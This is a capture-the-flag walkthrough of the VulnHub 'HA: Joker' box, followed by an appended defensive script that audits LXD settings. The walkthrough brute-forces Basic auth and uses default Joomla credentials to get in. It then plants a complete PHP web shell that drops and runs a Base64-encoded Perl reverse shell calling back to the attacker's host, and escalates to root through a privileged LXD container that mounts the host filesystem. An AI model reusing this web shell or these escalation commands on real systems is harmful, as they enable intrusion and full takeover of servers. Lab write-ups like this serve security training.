VulnHub box walkthrough: HA: Joker
Box URL: https://www.vulnhub.com/entry/ha-joker,379/
Import the box into the hypervisor and set its network adapter to NAT.
First, find the target's IP.
OK, the target IP is found.
Try port 8080 on a hunch:
Capture the request and take a look: the Authorization header is Base64 (HTTP Basic auth).
Brute-force it.
After logging in, this is what we see.
The password we just got does not work here, so look at the page source.
It is Joomla.
A quick Baidu search gives the default admin path:
Enter the Joomla back end with the default password:
Write a shell into the template's index.php:
    <?php
    // Locate a binary with `which`, falling back to the bare name.
    function which($pr) {
        $path = execute("which $pr");
        return ($path ? $path : $pr);
    }
    // Run a command through whichever execution function PHP still has enabled.
    function execute($cfe) {
        $res = '';
        if ($cfe) {
            if (function_exists('exec')) {
                @exec($cfe, $res);
                $res = join("\n", $res);
            } elseif (function_exists('shell_exec')) {
                $res = @shell_exec($cfe);
            } elseif (function_exists('system')) {
                @ob_start();
                @system($cfe);
                $res = @ob_get_contents();
                @ob_end_clean();
            } elseif (function_exists('passthru')) {
                @ob_start();
                @passthru($cfe);
                $res = @ob_get_contents();
                @ob_end_clean();
            } elseif (@is_resource($f = @popen($cfe, "r"))) {
                $res = '';
                while (!@feof($f)) {
                    $res .= @fread($f, 1024);
                }
                @pclose($f);
            }
        }
        return $res;
    }
    // Write Base64-decoded content to a file.
    function cf($fname, $text) {
        if ($fp = @fopen($fname, 'w')) {
            @fputs($fp, @base64_decode($text));
            @fclose($fp);
        }
    }
    $yourip = "192.168.124.134";   // Kali host running the listener
    $yourport = '4444';
    $usedb = array('perl'=>'perl','c'=>'c');
    // Base64-encoded Perl back-connect script, dropped to /tmp/.bc below.
    $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
    "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
    "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
    "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
    "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
    "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
    "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
    cf('/tmp/.bc', $back_connect);
    // Launch the dropped script in the background against the listener configured above.
    $res = execute(which('perl') . " /tmp/.bc $yourip $yourport &");
    ?>
Start a listener on port 4444 on Kali and request index.php; the reverse shell comes back.
Privilege escalation
Here we use LXD to escalate privileges.
Use the script from GitHub to build the image:
wget http://192.168.124.134:8000/alpine-v3.10-x86_64-20191201_0106.tar.gz
Then import the image into LXD:
lxc image import ./alpine-v3.10-x86_64-20191201_0106.tar.gz --alias ying
Run the following commands in order:
lxc init ying ignite -c security.privileged=true
lxc config device add ignite ying disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id
Go into /mnt/root and all of the target's files are visible.
Finally, /mnt/root/root contains a final.txt file.
That concludes the box.
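As a defender's footnote to the LXD steps above, here is an added audit script (example code, not part of the original walkthrough) that flags the two conditions the escalation depends on: a non-root account in the lxd group, and a container that is privileged with the host's / attached as a disk device. It parses /etc/group-style text and lxc config show output passed in as strings; the container name ignite and device name ying come from the walkthrough, all other sample values are constructed.

```shell
# Added defensive audit (example code, not from the original walkthrough).
# It flags the two conditions the LXD escalation above depends on: an account
# in the lxd group, and a privileged container with the host's / attached as
# a disk device. Inputs are passed as text; the samples below are constructed.

# Print the members of the lxd group from /etc/group-formatted text.
lxd_group_members() {
    printf '%s\n' "$1" | awk -F: '$1 == "lxd" { print $4 }'
}

# Print 1 if `lxc config show <name> --expanded` output describes a privileged
# container with a disk device whose source is the host root, else 0.
lxc_config_is_host_escape() {
    printf '%s\n' "$1" | awk '
        function check() { if (typ == "disk" && src == "/") rootdisk = 1 }
        /^config:/  { incfg = 1; next }
        /^devices:/ { indev = 1; incfg = 0; next }
        /^[^ ]/     { if (indev) check(); incfg = 0; indev = 0 }
        incfg && $1 == "security.privileged:" && $2 == "\"true\"" { priv = 1 }
        indev && /^  [^ ]/ { check(); src = ""; typ = ""; next }
        indev && $1 == "source:" { src = $2 }
        indev && $1 == "type:"   { typ = $2 }
        END { check(); r = (priv && rootdisk) ? 1 : 0; print r }'
}

# Constructed samples: the state left by the steps above, and a safe container.
SAMPLE_GROUP='root:x:0:
lxd:x:130:joker'

SAMPLE_CONFIG='architecture: x86_64
config:
  security.privileged: "true"
devices:
  ying:
    path: /mnt/root
    recursive: "true"
    source: /
    type: disk
ephemeral: false'

SAFE_CONFIG='config:
  image.os: alpine
devices:
  root:
    path: /
    pool: default
    type: disk'
echo "lxd group members: $(lxd_group_members "$SAMPLE_GROUP")"
echo "ignite escape-capable: $(lxc_config_is_host_escape "$SAMPLE_CONFIG")"
echo "hardened escape-capable: $(lxc_config_is_host_escape "$SAFE_CONFIG")"
```

On a live host, feed it `getent group lxd` and `lxc config show <name> --expanded`; an empty lxd group and a 0 for every container means the path used above is closed.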